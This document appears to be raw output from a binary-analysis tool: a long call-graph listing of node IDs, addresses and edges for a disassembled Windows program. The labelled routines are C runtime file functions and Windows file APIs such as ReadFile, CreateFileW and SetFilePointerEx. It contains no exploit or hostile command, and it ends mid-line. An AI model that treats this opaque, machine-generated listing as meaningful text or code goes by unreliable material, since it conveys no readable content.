99144->99146 99147 1211bc 99144->99147 99145 12128a 99149 121303 ReadFile 99145->99149 99154 1212a0 GetConsoleMode 99145->99154 99228 118d68 58 API calls __getptd_noexit 99146->99228 99230 121b11 60 API calls 3 library calls 99147->99230 99152 1217e3 GetLastError 99149->99152 99153 121325 99149->99153 99151 1211a6 99229 118d34 58 API calls __getptd_noexit 99151->99229 99156 1217f0 99152->99156 99157 1212e3 99152->99157 99153->99152 99161 1212f5 99153->99161 99158 121300 99154->99158 99159 1212b4 99154->99159 99236 118d68 58 API calls __getptd_noexit 99156->99236 99171 1212e9 99157->99171 99231 118d47 58 API calls 3 library calls 99157->99231 99158->99149 99159->99158 99162 1212ba ReadConsoleW 99159->99162 99169 12135a 99161->99169 99170 1215c7 99161->99170 99161->99171 99162->99161 99164 1212dd GetLastError 99162->99164 99163 1217f5 99237 118d34 58 API calls __getptd_noexit 99163->99237 99164->99157 99167->99104 99168 112f95 _free 58 API calls 99168->99167 99173 1213c6 ReadFile 99169->99173 99177 121447 99169->99177 99170->99171 99176 1216cd ReadFile 99170->99176 99171->99167 99171->99168 99174 1213e7 GetLastError 99173->99174 99181 1213f1 99173->99181 99174->99181 99175 1214f4 99233 118d68 58 API calls __getptd_noexit 99175->99233 99180 1216f0 GetLastError 99176->99180 99186 1216fe 99176->99186 99177->99171 99177->99175 99179 121504 99177->99179 99182 1214b4 MultiByteToWideChar 99177->99182 99179->99182 99234 121b11 60 API calls 3 library calls 99179->99234 99180->99186 99181->99169 99232 121b11 60 API calls 3 library calls 99181->99232 99182->99164 99182->99171 99186->99170 99235 121b11 60 API calls 3 library calls 99186->99235 99188 120e02 99187->99188 99192 120e17 99187->99192 99274 118d68 58 API calls __getptd_noexit 99188->99274 99190 120e07 99275 118ff6 9 API calls __mbschr_l 99190->99275 99193 120e4c 99192->99193 99199 120e12 99192->99199 99276 126234 58 API calls __malloc_crt 99192->99276 99195 114916 __filbuf 58 API calls 99193->99195 99196 120e60 99195->99196 99241 120f97 99196->99241 99198 120e67 99198->99199 99200 114916 __filbuf 58 API calls 99198->99200 99199->99104 99201 120e8a 99200->99201 99201->99199 99202 114916 __filbuf 58 API calls 99201->99202 99203 120e96 99202->99203 99203->99199 99204 114916 __filbuf 58 API calls 99203->99204 99205 120ea3 99204->99205 99206 114916 __filbuf 58 API calls 99205->99206 99206->99199 99207->99098 99208->99101 99209->99104 99210->99098 99211->99116 99212->99118 99214 125ed3 99213->99214 99215 125ec6 99213->99215 99217 125edf 99214->99217 99218 118d68 __mbschr_l 58 API calls 99214->99218 99216 118d68 __mbschr_l 58 API calls 99215->99216 99219 125ecb 99216->99219 99217->99145 99220 125f00 99218->99220 99219->99145 99221 118ff6 __mbschr_l 9 API calls 99220->99221 99221->99219 99222->99124 99223->99167 99224->99133 99225->99132 99226->99133 99227->99144 99228->99151 99229->99167 99230->99143 99231->99171 99232->99181 99233->99171 99234->99182 99235->99186 99236->99163 99237->99171 99238->99128 99239->99132 99240->99167 99242 120fa3 _raise 99241->99242 99243 120fb0 99242->99243 99244 120fc7 99242->99244 99246 118d34 __lseeki64 58 API calls 99243->99246 99245 12108b 99244->99245 99247 120fdb 99244->99247 99248 118d34 __lseeki64 58 API calls 99245->99248 99249 120fb5 99246->99249 99251 121006 99247->99251 99252 120ff9 99247->99252 99256 120ffe 99248->99256 99250 118d68 __mbschr_l 58 API calls 99249->99250 99269 120fbc _raise 99250->99269 99254 121013 99251->99254 99255 121028 99251->99255 99253 118d34 __lseeki64 58 API calls 99252->99253 99253->99256 99258 118d34 __lseeki64 58 API calls 99254->99258 99259 11d446 ___lock_fhandle 59 API calls 99255->99259 99257 118d68 __mbschr_l 58 API calls 99256->99257 99261 121020 99257->99261 99262 121018 99258->99262 99260 12102e 99259->99260 99263 121041 99260->99263 99264 121054 99260->99264 99267 118ff6 __mbschr_l 9 API calls 99261->99267 99265 118d68 __mbschr_l 58 API calls 99262->99265 99266 1210ab __read_nolock 70 API calls 99263->99266 99268 118d68 __mbschr_l 58 API calls 99264->99268 99265->99261 99270 12104d 99266->99270 99267->99269 99271 121059 99268->99271 99269->99198 99273 121083 __read LeaveCriticalSection 99270->99273 99272 118d34 __lseeki64 58 API calls 99271->99272 99272->99270 99273->99269 99274->99190 99275->99199 99276->99193 99280 11543a GetSystemTimeAsFileTime 99277->99280 99279 1591f8 99279->98872 99281 115468 __aulldiv 99280->99281 99281->99279 99283 115e9c _raise 99282->99283 99284 115ec3 99283->99284 99285 115eae 99283->99285 99287 116e4e __lock_file 59 API calls 99284->99287 99296 118d68 58 API calls __getptd_noexit 99285->99296 99289 115ec9 99287->99289 99288 115eb3 99297 118ff6 9 API calls __mbschr_l 99288->99297 99298 115b00 67 API calls 6 library calls 99289->99298 99292 115ed4 99299 115ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99292->99299 99294 115ee6 99295 115ebe _raise 99294->99295 99295->98877 99296->99288 99297->99295 99298->99292 99299->99294 99300->98748 99301->98761 99302->98763 99303->98759 99304->98769 99306 f92c9 Mailbox 99305->99306 99307 12f5c8 99306->99307 99312 f92d3 99306->99312 99308 110ff6 Mailbox 59 API calls 99307->99308 99310 12f5d4 99308->99310 99309 f92da 99309->98773 99312->99309 99313 f9df0 59 API calls Mailbox 99312->99313 99313->99312 99314->98780 99315->98779 99321 1599d2 __tzset_nolock _wcscmp 99316->99321 99317 159866 99317->98790 99317->98817 99318 159393 GetSystemTimeAsFileTime 99318->99321 99319 f506b 74 API calls 99319->99321 99320 f5045 85 API calls 99320->99321 99321->99317 99321->99318 99321->99319 99321->99320 99323 158d9b 99322->99323 99324 158da9 99322->99324 99325 11548b 115 API calls 99323->99325 99326 158dee 99324->99326 99327 11548b 115 API calls 99324->99327 99337 158db2 99324->99337 99325->99324 99353 15901b 99326->99353 99329 158dd3 99327->99329 99329->99326 99331 158ddc 99329->99331 99330 158e32 99332 158e57 99330->99332 99333 158e36 99330->99333 99334 1155d6 __fcloseall 83 API calls 99331->99334 99331->99337 99357 158c33 99332->99357 99336 158e43 99333->99336 99339 1155d6 __fcloseall 83 API calls 99333->99339 99334->99337 99336->99337 99341 1155d6 __fcloseall 83 API calls 99336->99341 99337->98819 99339->99336 99340 158e85 99366 158eb5 99340->99366 99341->99337 99342 158e72 99342->99337 99348 1155d6 __fcloseall 83 API calls 99342->99348 99343 158e65 99343->99342 99345 1155d6 __fcloseall 83 API calls 99343->99345 99345->99342 99348->99337 99350 158ea0 99350->99337 99352 1155d6 __fcloseall 83 API calls 99350->99352 99352->99337 99354 159040 99353->99354 99356 159029 __tzset_nolock _memmove 99353->99356 99355 115812 __fread_nolock 74 API calls 99354->99355 99355->99356 99356->99330 99358 11594c std::exception::_Copy_str 58 API calls 99357->99358 99359 158c42 99358->99359 99360 11594c std::exception::_Copy_str 58 API calls 99359->99360 99361 158c56 99360->99361 99362 11594c std::exception::_Copy_str 58 API calls 99361->99362 99363 158c6a 99362->99363 99364 158f97 58 API calls 99363->99364 99365 158c7d 99363->99365 99364->99365 99365->99340 99365->99343 99368 158eca 99366->99368 99367 158f82 99395 1591bf 99367->99395 99368->99367 99370 158c8f 74 API calls 99368->99370 99373 158e8c 99368->99373 99399 158d2b 74 API calls 99368->99399 99400 15909c 80 API calls 99368->99400 99370->99368 99374 158f97 99373->99374 99375 158fa4 99374->99375 99376 158faa 99374->99376 99377 112f95 _free 58 API calls 99375->99377 99378 112f95 _free 58 API calls 99376->99378 99379 158fbb 99376->99379 99377->99376 99378->99379 99380 158e93 99379->99380 99381 112f95 _free 58 API calls 99379->99381 99380->99350 99382 1155d6 99380->99382 99381->99380 99383 1155e2 _raise 99382->99383 99384 1155f6 99383->99384 99385 11560e 99383->99385 99482 118d68 58 API calls __getptd_noexit 99384->99482 99388 116e4e __lock_file 59 API calls 99385->99388 99391 115606 _raise 99385->99391 99387 1155fb 99483 118ff6 9 API calls __mbschr_l 99387->99483 99390 115620 99388->99390 99466 11556a 99390->99466 99391->99350 99396 1591dd 99395->99396 99397 1591cc 99395->99397 99396->99373 99401 114a93 99397->99401 99399->99368 99400->99368 99402 114a9f _raise 99401->99402 99403 114ad5 99402->99403 99404 114abd 99402->99404 99406 114acd _raise 99402->99406 99407 116e4e __lock_file 59 API calls 99403->99407 99426 118d68 58 API calls __getptd_noexit 99404->99426 99406->99396 99409 114adb 99407->99409 99408 114ac2 99427 118ff6 9 API calls __mbschr_l 99408->99427 99414 11493a 99409->99414 99417 114949 99414->99417 99420 114967 99414->99420 99415 114957 99457 118d68 58 API calls __getptd_noexit 99415->99457 99417->99415 99417->99420 99423 114981 _memmove 99417->99423 99418 11495c 99458 118ff6 9 API calls __mbschr_l 99418->99458 99428 114b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99420->99428 99423->99420 99424 114916 __filbuf 58 API calls 99423->99424 99429 11dac6 99423->99429 99459 114c6d 99423->99459 99465 11b05e 78 API calls 6 library calls 99423->99465 99424->99423 99426->99408 99427->99406 99428->99406 99430 11dad2 _raise 99429->99430 99431 11daf6 99430->99431 99432 11dadf 99430->99432 99434 11db95 99431->99434 99437 11db0a 99431->99437 99433 118d34 __lseeki64 58 API calls 99432->99433 99436 11dae4 99433->99436 99435 118d34 __lseeki64 58 API calls 99434->99435 99438 11db2d 99435->99438 99439 118d68 __mbschr_l 58 API calls 99436->99439 99440 11db32 99437->99440 99441 11db28 99437->99441 99444 118d68 __mbschr_l 58 API calls 99438->99444 99452 11daeb _raise 99439->99452 99442 11d446 ___lock_fhandle 59 API calls 99440->99442 99443 118d34 __lseeki64 58 API calls 99441->99443 99445 11db38 99442->99445 99443->99438 99446 11dba1 99444->99446 99447 11db4b 99445->99447 99448 11db5e 99445->99448 99449 118ff6 __mbschr_l 9 API calls 99446->99449 99450 11dbb5 __write_nolock 76 API calls 99447->99450 99451 118d68 __mbschr_l 58 API calls 99448->99451 99449->99452 99453 11db57 99450->99453 99454 11db63 99451->99454 99452->99423 99456 11db8d __write LeaveCriticalSection 99453->99456 99455 118d34 __lseeki64 58 API calls 99454->99455 99455->99453 99456->99452 99457->99418 99458->99420 99460 114c80 99459->99460 99464 114ca4 99459->99464 99461 114916 __filbuf 58 API calls 99460->99461 99460->99464 99462 114c9d 99461->99462 99463 11dac6 __write 78 API calls 99462->99463 99463->99464 99464->99423 99465->99423 99467 115579 99466->99467 99468 11558d 99466->99468 99515 118d68 58 API calls __getptd_noexit 99467->99515 99471 114c6d __flush 78 API calls 99468->99471 99480 115589 99468->99480 99470 11557e 99516 118ff6 9 API calls __mbschr_l 99470->99516 99473 115599 99471->99473 99485 120dc7 99473->99485 99476 114916 __filbuf 58 API calls 99477 1155a7 99476->99477 99489 120c52 99477->99489 99479 1155ad 99479->99480 99481 112f95 _free 58 API calls 99479->99481 99484 115645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99480->99484 99481->99480 99482->99387 99483->99391 99484->99391 99486 1155a1 99485->99486 99487 120dd4 99485->99487 99486->99476 99487->99486 99488 112f95 _free 58 API calls 99487->99488 99488->99486 99490 120c5e _raise 99489->99490 99491 120c82 99490->99491 99492 120c6b 99490->99492 99494 120d0d 99491->99494 99496 120c92 99491->99496 99541 118d34 58 API calls __getptd_noexit 99492->99541 99546 118d34 58 API calls __getptd_noexit 99494->99546 99495 120c70 99542 118d68 58 API calls __getptd_noexit 99495->99542 99499 120cb0 99496->99499 99500 120cba 99496->99500 99543 118d34 58 API calls __getptd_noexit 99499->99543 99517 11d446 99500->99517 99501 120cb5 99547 118d68 58 API calls __getptd_noexit 99501->99547 99503 120c77 _raise 99503->99479 99506 120cc0 99508 120cd3 99506->99508 99509 120cde 99506->99509 99507 120d19 99548 118ff6 9 API calls __mbschr_l 99507->99548 99526 120d2d 99508->99526 99544 118d68 58 API calls __getptd_noexit 99509->99544 99513 120cd9 99545 120d05 LeaveCriticalSection __unlock_fhandle 99513->99545 99515->99470 99516->99480 99518 11d452 _raise 99517->99518 99519 11d4a1 EnterCriticalSection 99518->99519 99520 119e4b __lock 58 API calls 99518->99520 99521 11d4c7 _raise 99519->99521 99522 11d477 99520->99522 99521->99506 99523 11d48f 99522->99523 99549 11a06b InitializeCriticalSectionAndSpinCount 99522->99549 99550 11d4cb LeaveCriticalSection _doexit 99523->99550 99551 11d703 99526->99551 99528 120d91 99564 11d67d 59 API calls 2 library calls 99528->99564 99530 120d3b 99530->99528 99533 11d703 __commit 58 API calls 99530->99533 99540 120d6f 99530->99540 99531 11d703 __commit 58 API calls 99534 120d7b FindCloseChangeNotification 99531->99534 99532 120d99 99538 120dbb 99532->99538 99565 118d47 58 API calls 3 library calls 99532->99565 99535 120d66 99533->99535 99534->99528 99536 120d87 GetLastError 99534->99536 99539 11d703 __commit 58 API calls 99535->99539 99536->99528 99538->99513 99539->99540 99540->99528 99540->99531 99541->99495 99542->99503 99543->99501 99544->99513 99545->99503 99546->99501 99547->99507 99548->99503 99549->99523 99550->99519 99552 11d70e 99551->99552 99553 11d723 99551->99553 99554 118d34 __lseeki64 58 API calls 99552->99554 99556 118d34 __lseeki64 58 API calls 99553->99556 99558 11d748 99553->99558 99555 11d713 99554->99555 99557 118d68 __mbschr_l 58 API calls 99555->99557 99559 11d752 99556->99559 99560 11d71b 99557->99560 99558->99530 99561 118d68 __mbschr_l 58 API calls 99559->99561 99560->99530 99562 11d75a 99561->99562 99563 118ff6 __mbschr_l 9 API calls 99562->99563 99563->99560 99564->99532 99565->99538 99567 1109e2 __write_nolock 99566->99567 99568 1109f1 GetLongPathNameW 99567->99568 99569 f7d2c 59 API calls 99568->99569 99570 f741d 99569->99570 99571 f716b 99570->99571 99572 f77c7 59 API calls 99571->99572 99573 f717d 99572->99573 99574 f48ae 60 API calls 99573->99574 99575 f7188 99574->99575 99576 12ecae 99575->99576 99577 f7193 99575->99577 99582 12ecc8 99576->99582 99624 f7a68 61 API calls 99576->99624 99578 f3f84 59 API calls 99577->99578 99580 f719f 99578->99580 99618 f34c2 99580->99618 99583 f71b2 Mailbox 99583->98596 99585 f4f3d 136 API calls 99584->99585 99586 f69ef 99585->99586 99587 12e45a 99586->99587 99589 f4f3d 136 API calls 99586->99589 99588 1597e5 122 API calls 99587->99588 99590 12e46f 99588->99590 99591 f6a03 99589->99591 99593 12e473 99590->99593 99594 12e490 99590->99594 99591->99587 99592 f6a0b 99591->99592 99595 f6a17 99592->99595 99596 12e47b 99592->99596 99597 f4faa 84 API calls 99593->99597 99598 110ff6 Mailbox 59 API calls 99594->99598 99625 f6bec 99595->99625 99732 154534 90 API calls _wprintf 99596->99732 99597->99596 99607 12e4d5 Mailbox 99598->99607 99602 12e489 99602->99594 99603 12e689 99604 112f95 _free 58 API calls 99603->99604 99605 12e691 99604->99605 99606 f4faa 84 API calls 99605->99606 99609 12e69a 99606->99609 99607->99603 99607->99609 99615 f7f41 59 API calls 99607->99615 99718 f766f 99607->99718 99726 f74bd 99607->99726 99733 14fc4d 59 API calls 2 library calls 99607->99733 99734 14fb6e 61 API calls 2 library calls 99607->99734 99735 157621 59 API calls Mailbox 99607->99735 99612 112f95 _free 58 API calls 99609->99612 99613 f4faa 84 API calls 99609->99613 99736 14fcb1 89 API calls 4 library calls 99609->99736 99612->99609 99613->99609 99615->99607 99619 f34d4 99618->99619 99623 f34f3 _memmove 99618->99623 99621 110ff6 Mailbox 59 API calls 99619->99621 99620 110ff6 Mailbox 59 API calls 99622 f350a 99620->99622 99621->99623 99622->99583 99623->99620 99624->99576 99626 12e847 99625->99626 99627 f6c15 99625->99627 99828 14fcb1 89 API calls 4 library calls 99626->99828 99742 f5906 60 API calls Mailbox 99627->99742 99630 f6c37 99743 f5956 99630->99743 99631 12e85a 99829 14fcb1 89 API calls 4 library calls 99631->99829 99634 f6c54 99637 f77c7 59 API calls 99634->99637 99636 12e876 99666 f6cc1 99636->99666 99638 f6c60 99637->99638 99756 110b9b 60 API calls __write_nolock 99638->99756 99640 f6ccf 99644 f77c7 59 API calls 99640->99644 99641 12e889 99643 f5dcf CloseHandle 99641->99643 99642 f6c6c 99645 f77c7 59 API calls 99642->99645 99646 12e895 99643->99646 99647 f6cd8 99644->99647 99648 f6c78 99645->99648 99650 f4f3d 136 API calls 99646->99650 99651 f77c7 59 API calls 99647->99651 99649 f48ae 60 API calls 99648->99649 99652 f6c86 99649->99652 99653 12e8b1 99650->99653 99654 f6ce1 99651->99654 99757 f59b0 ReadFile SetFilePointerEx 99652->99757 99656 12e8da 99653->99656 99659 1597e5 122 API calls 99653->99659 99766 f46f9 99654->99766 99830 14fcb1 89 API calls 4 library calls 99656->99830 99658 f6cb2 99758 f5c4e 99658->99758 99663 12e8cd 99659->99663 99667 12e8f6 99663->99667 99668 12e8d5 99663->99668 99665 12e8f1 99696 f6e6c Mailbox 99665->99696 99666->99640 99666->99641 99670 f4faa 84 API calls 99667->99670 99671 f4faa 84 API calls 99668->99671 99672 12e8fb 99670->99672 99671->99656 99673 110ff6 Mailbox 59 API calls 99672->99673 99680 12e92f 99673->99680 99677 f3bcd 99677->98463 99677->98486 99681 f766f 59 API calls 99680->99681 99715 12e978 Mailbox 99681->99715 99685 12eb69 99835 157581 59 API calls Mailbox 99685->99835 99689 12eb8b 99836 15f835 59 API calls 2 library calls 99689->99836 99692 12eb98 99694 112f95 _free 58 API calls 99692->99694 99694->99696 99737 f5934 99696->99737 99698 f766f 59 API calls 99698->99715 99708 f7f41 59 API calls 99708->99715 99712 12ebbb 99837 14fcb1 89 API calls 4 library calls 99712->99837 99714 12ebd4 99716 112f95 _free 58 API calls 99714->99716 99715->99685 99715->99698 99715->99708 99715->99712 99831 14fc4d 59 API calls 2 library calls 99715->99831 99832 14fb6e 61 API calls 2 library calls 99715->99832 99833 157621 59 API calls Mailbox 99715->99833 99834 f7373 59 API calls Mailbox 99715->99834 99717 12ebe7 99716->99717 99717->99696 99719 f770f 99718->99719 99720 f7682 _memmove 99718->99720 99722 110ff6 Mailbox 59 API calls 99719->99722 99721 110ff6 Mailbox 59 API calls 99720->99721 99724 f7689 99721->99724 99722->99720 99723 f76b2 99723->99607 99724->99723 99725 110ff6 Mailbox 59 API calls 99724->99725 99725->99723 99727 f74d0 99726->99727 99729 f757e 99726->99729 99728 110ff6 Mailbox 59 API calls 99727->99728 99731 f7502 99727->99731 99728->99731 99729->99607 99730 110ff6 59 API calls Mailbox 99730->99731 99731->99729 99731->99730 99732->99602 99733->99607 99734->99607 99735->99607 99736->99609 99738 f5dcf CloseHandle 99737->99738 99739 f593c Mailbox 99738->99739 99740 f5dcf CloseHandle 99739->99740 99741 f594b 99740->99741 99741->99677 99742->99630 99744 f5dcf CloseHandle 99743->99744 99745 f5962 99744->99745 99840 f5df9 99745->99840 99747 f59a4 99747->99631 99747->99634 99748 f5981 99748->99747 99848 f5770 99748->99848 99750 f5993 99865 f53db SetFilePointerEx SetFilePointerEx 99750->99865 99752 f599a 99752->99747 99753 12e030 99752->99753 99866 153696 SetFilePointerEx SetFilePointerEx WriteFile 99753->99866 99755 12e060 99755->99747 99756->99642 99757->99658 99764 f5c68 99758->99764 99759 f5cef SetFilePointerEx 99879 f5dae SetFilePointerEx 99759->99879 99760 12e151 99880 f5dae SetFilePointerEx 99760->99880 99763 f5cc3 99763->99666 99764->99759 99764->99760 99764->99763 99765 12e16b 99767 f77c7 59 API calls 99766->99767 99768 f470f 99767->99768 99769 f77c7 59 API calls 99768->99769 99770 f4717 99769->99770 99771 f77c7 59 API calls 99770->99771 99772 f471f 99771->99772 99773 f77c7 59 API calls 99772->99773 99774 f4727 99773->99774 99775 f475b 99774->99775 99776 12d8fb 99774->99776 99777 f79ab 59 API calls 99775->99777 99778 f81a7 59 API calls 99776->99778 99779 f4769 99777->99779 99780 12d904 99778->99780 99781 f7e8c 59 API calls 99779->99781 99782 f7eec 59 API calls 99780->99782 99783 f4773 99781->99783 99785 f479e 99782->99785 99784 f79ab 59 API calls 99783->99784 99783->99785 99787 f4794 99784->99787 99788 f47bd 99785->99788 99801 f47de 99785->99801 99803 12d924 99785->99803 99790 f7e8c 59 API calls 99787->99790 99792 f7b52 59 API calls 99788->99792 99789 f47ef 99790->99785 99791 12d9f4 99794 f7d2c 59 API calls 99791->99794 99795 f47c7 99792->99795 99812 12d9b1 99794->99812 99799 f79ab 59 API calls 99795->99799 99795->99801 99799->99801 99800 12d9dd 99800->99791 99807 12d9c8 99800->99807 99881 f79ab 99801->99881 99803->99791 99803->99800 99811 12d95b 99803->99811 99806 f7b52 59 API calls 99806->99812 99810 f7d2c 59 API calls 99807->99810 99808 12d9b9 99809 f7d2c 59 API calls 99808->99809 99809->99812 99810->99812 99811->99808 99815 12d9a4 99811->99815 99812->99801 99812->99806 99894 f7a84 59 API calls 2 library calls 99812->99894 99816 f7d2c 59 API calls 99815->99816 99816->99812 99828->99631 99829->99636 99830->99665 99831->99715 99832->99715 99833->99715 99834->99715 99835->99689 99836->99692 99837->99714 99841 12e181 99840->99841 99842 f5e12 CreateFileW 99840->99842 99843 f5e34 99841->99843 99844 12e187 CreateFileW 99841->99844 99842->99843 99843->99748 99844->99843 99845 12e1ad 99844->99845 99846 f5c4e 2 API calls 99845->99846 99847 12e1b8 99846->99847 99847->99843 99849 f578b 99848->99849 99850 12dfce 99848->99850 99851 f5c4e 2 API calls 99849->99851 99856 f581a 99849->99856 99850->99856 99873 f5e3f 99850->99873 99852 f57ad 99851->99852 99853 f538e 59 API calls 99852->99853 99855 f57b7 99853->99855 99855->99850 99857 f57c4 99855->99857 99856->99750 99858 110ff6 Mailbox 59 API calls 99857->99858 99859 f57cf 99858->99859 99860 f538e 59 API calls 99859->99860 99861 f57da 99860->99861 99867 f5d20 99861->99867 99864 f5c4e 2 API calls 99864->99856 99865->99752 99866->99755 99868 f5d93 99867->99868 99872 f5d2e 99867->99872 99878 f5dae SetFilePointerEx 99868->99878 99870 f5807 99870->99864 99871 f5d66 ReadFile 99871->99870 99871->99872 99872->99870 99872->99871 99874 f5c4e 2 API calls 99873->99874 99875 f5e60 99874->99875 99876 f5c4e 2 API calls 99875->99876 99877 f5e74 99876->99877 99877->99856 99878->99872 99879->99763 99880->99765 99882 f79ba 99881->99882 99883 f7a17 99881->99883 99882->99883 99885 f79c5 99882->99885 99884 f7e8c 59 API calls 99883->99884 99890 f79e8 _memmove 99884->99890 99886 12ef32 99885->99886 99887 f79e0 99885->99887 99890->99789 99894->99812 99896 f6ef5 99895->99896 99900 f7009 99895->99900 99897 110ff6 Mailbox 59 API calls 99896->99897 99896->99900 99899 f6f1c 99897->99899 99898 110ff6 Mailbox 59 API calls 99899->99898 99900->98602 99906->98605 100362 fe70b 100365 fd260 100362->100365 100364 fe719 100366 fd27d 100365->100366 100383 fd4dd 100365->100383 100367 132abb 100366->100367 100368 132b0a 100366->100368 100392 fd2a4 100366->100392 100370 132abe 100367->100370 100379 132ad9 100367->100379 100409 16a6fb 331 API calls __cinit 100368->100409 100372 132aca 100370->100372 100370->100392 100407 16ad0f 331 API calls 100372->100407 100375 112f80 __cinit 67 API calls 100375->100392 100376 fd594 100401 f8bb2 68 API calls 100376->100401 100377 132cdf 100377->100377 100378 fd6ab 100378->100364 100379->100383 100408 16b1b7 331 API calls 3 library calls 100379->100408 100383->100378 100414 15a0b5 89 API calls 4 library calls 100383->100414 100384 132c26 100413 16aa66 89 API calls 100384->100413 100385 fd5a3 100385->100364 100388 f8620 69 API calls 100388->100392 100392->100375 100392->100376 100392->100378 100392->100383 100392->100384 100392->100388 100396 fa000 331 API calls 100392->100396 100397 f81a7 59 API calls 100392->100397 100399 f88a0 68 API calls __cinit 100392->100399 100400 f86a2 68 API calls 100392->100400 100402 f859a 68 API calls 100392->100402 100403 fd0dc 331 API calls 100392->100403 100404 f9f3a 59 API calls Mailbox 100392->100404 100405 fd060 89 API calls 100392->100405 100406 fcedd 331 API calls 100392->100406 100410 f8bb2 68 API calls 100392->100410 100411 f9e9c 60 API calls Mailbox 100392->100411 100412 146d03 60 API calls 100392->100412 100396->100392 100397->100392 100399->100392 100400->100392 100401->100385 100402->100392 100403->100392 100404->100392 100405->100392 100406->100392 100407->100378 100408->100383 100409->100392 100410->100392 100411->100392 100412->100392 100413->100383 100414->100377 100415 12ff06 100416 12ff10 100415->100416 100423 fac90 Mailbox _memmove 100415->100423 100650 f8e34 59 API calls Mailbox 100416->100650 100419 fb685 100655 15a0b5 89 API calls 4 library calls 100419->100655 100421 110ff6 59 API calls Mailbox 100433 fa097 Mailbox 100421->100433 100422 fb5da 100660 15a0b5 89 API calls 4 library calls 100422->100660 100423->100419 100427 fa1b7 100423->100427 100423->100433 100437 f7f41 59 API calls 100423->100437 100445 16bf80 331 API calls 100423->100445 100448 110ff6 59 API calls Mailbox 100423->100448 100449 fb416 100423->100449 100450 fa000 331 API calls 100423->100450 100452 130c94 100423->100452 100454 130ca2 100423->100454 100457 fb37c 100423->100457 100464 fade2 Mailbox 100423->100464 100603 16c5f4 100423->100603 100635 157be0 100423->100635 100641 1466f4 100423->100641 100651 147405 59 API calls 100423->100651 100652 16c4a7 85 API calls 2 library calls 100423->100652 100426 fb5d5 100431 f81a7 59 API calls 100426->100431 100429 f81a7 59 API calls 100429->100433 100431->100427 100432 13047f 100654 15a0b5 89 API calls 4 library calls 100432->100654 100433->100421 100433->100422 100433->100426 100433->100427 100433->100429 100433->100432 100436 f77c7 59 API calls 100433->100436 100439 147405 59 API calls 100433->100439 100442 130e00 100433->100442 100444 112f80 67 API calls __cinit 100433->100444 100447 fa6ba 100433->100447 100644 fca20 331 API calls 2 library calls 100433->100644 100645 fba60 60 API calls Mailbox 100433->100645 100436->100433 100437->100423 100438 13048e 100439->100433 100441 1466f4 Mailbox 59 API calls 100441->100427 100659 15a0b5 89 API calls 4 library calls 100442->100659 100444->100433 100445->100423 100658 15a0b5 89 API calls 4 library calls 100447->100658 100448->100423 100649 ff803 331 API calls 100449->100649 100450->100423 100656 f9df0 59 API calls Mailbox 100452->100656 100657 15a0b5 89 API calls 4 library calls 100454->100657 100456 130c86 100456->100427 100456->100441 100647 f9e9c 60 API calls Mailbox 100457->100647 100459 fb38d 100648 f9e9c 60 API calls Mailbox 100459->100648 100464->100419 100464->100427 100464->100456 100465 1300e0 VariantClear 100464->100465 100469 16474d 331 API calls 100464->100469 100472 16e24b 100464->100472 100475 15d2e6 100464->100475 100522 16e237 100464->100522 100525 102123 100464->100525 100565 1723c9 100464->100565 100646 f9df0 59 API calls Mailbox 100464->100646 100653 147405 59 API calls 100464->100653 100465->100464 100469->100464 100661 16cdf1 100472->100661 100474 16e25b 100474->100464 100476 15d305 100475->100476 100477 15d310 100475->100477 100751 f9c9c 59 API calls 100476->100751 100481 f77c7 59 API calls 100477->100481 100520 15d3ea Mailbox 100477->100520 100479 110ff6 Mailbox 59 API calls 100480 15d433 100479->100480 100482 15d43f 100480->100482 100754 f5906 60 API calls Mailbox 100480->100754 100483 15d334 100481->100483 100486 f9997 84 API calls 100482->100486 100485 f77c7 59 API calls 100483->100485 100487 15d33d 100485->100487 100488 15d457 100486->100488 100489 f9997 84 API calls 100487->100489 100490 f5956 67 API calls 100488->100490 100491 15d349 100489->100491 100492 15d466 100490->100492 100493 f46f9 59 API calls 100491->100493 100494 15d49e 100492->100494 100495 15d46a GetLastError 100492->100495 100496 15d35e 100493->100496 100500 15d500 100494->100500 100501 15d4c9 100494->100501 100498 15d483 100495->100498 100497 f7c8e 59 API calls 100496->100497 100499 15d391 100497->100499 100517 15d3f3 Mailbox 100498->100517 100755 f5a1a CloseHandle 100498->100755 100502 15d3e3 100499->100502 100507 153e73 3 API calls 100499->100507 100503 110ff6 Mailbox 59 API calls 100500->100503 100504 110ff6 Mailbox 59 API calls 100501->100504 100753 f9c9c 59 API calls 100502->100753 100508 15d505 100503->100508 100509 15d4ce 100504->100509 100510 15d3a1 100507->100510 100513 f77c7 59 API calls 100508->100513 100508->100517 100511 15d4df 100509->100511 100514 f77c7 59 API calls 100509->100514 100510->100502 100512 15d3a5 100510->100512 100756 15f835 59 API calls 2 library calls 100511->100756 100516 f7f41 59 API calls 100512->100516 100513->100517 100514->100511 100518 15d3b2 100516->100518 100517->100464 100752 153c66 63 API calls Mailbox 100518->100752 100520->100479 100520->100517 100521 15d3bb Mailbox 100521->100502 100523 16cdf1 130 API calls 100522->100523 100524 16e247 100523->100524 100524->100464 100526 f9bf8 59 API calls 100525->100526 100527 10213b 100526->100527 100529 110ff6 Mailbox 59 API calls 100527->100529 100533 1369af 100527->100533 100530 102154 100529->100530 100531 102164 100530->100531 100772 f5906 60 API calls Mailbox 100530->100772 100535 f9997 84 API calls 100531->100535 100532 102189 100540 102196 100532->100540 100777 f9c9c 59 API calls 100532->100777 100533->100532 100776 15f7df 59 API calls 100533->100776 100537 102172 100535->100537 100539 f5956 67 API calls 100537->100539 100538 1369f7 100538->100540 100541 1369ff 100538->100541 100542 102181 100539->100542 100544 f5e3f 2 API calls 100540->100544 100778 f9c9c 59 API calls 100541->100778 100542->100532 100542->100533 100775 f5a1a CloseHandle 100542->100775 100546 10219d 100544->100546 100547 136a11 100546->100547 100548 1021b7 100546->100548 100550 110ff6 Mailbox 59 API calls 100547->100550 100549 f77c7 59 API calls 100548->100549 100551 1021bf 100549->100551 100552 136a17 100550->100552 100757 f56d2 100551->100757 100554 136a2b 100552->100554 100779 f59b0 ReadFile SetFilePointerEx 100552->100779 100559 136a2f _memmove 100554->100559 100780 15794e 59 API calls 2 library calls 100554->100780 100556 1021ce 100556->100559 100773 f9b9c 59 API calls Mailbox 100556->100773 100560 1021e2 Mailbox 100561 10221c 100560->100561 100562 f5dcf CloseHandle 100560->100562 100561->100464 100563 102210 100562->100563 100563->100561 100774 f5a1a CloseHandle 100563->100774 100566 f77c7 59 API calls 100565->100566 100567 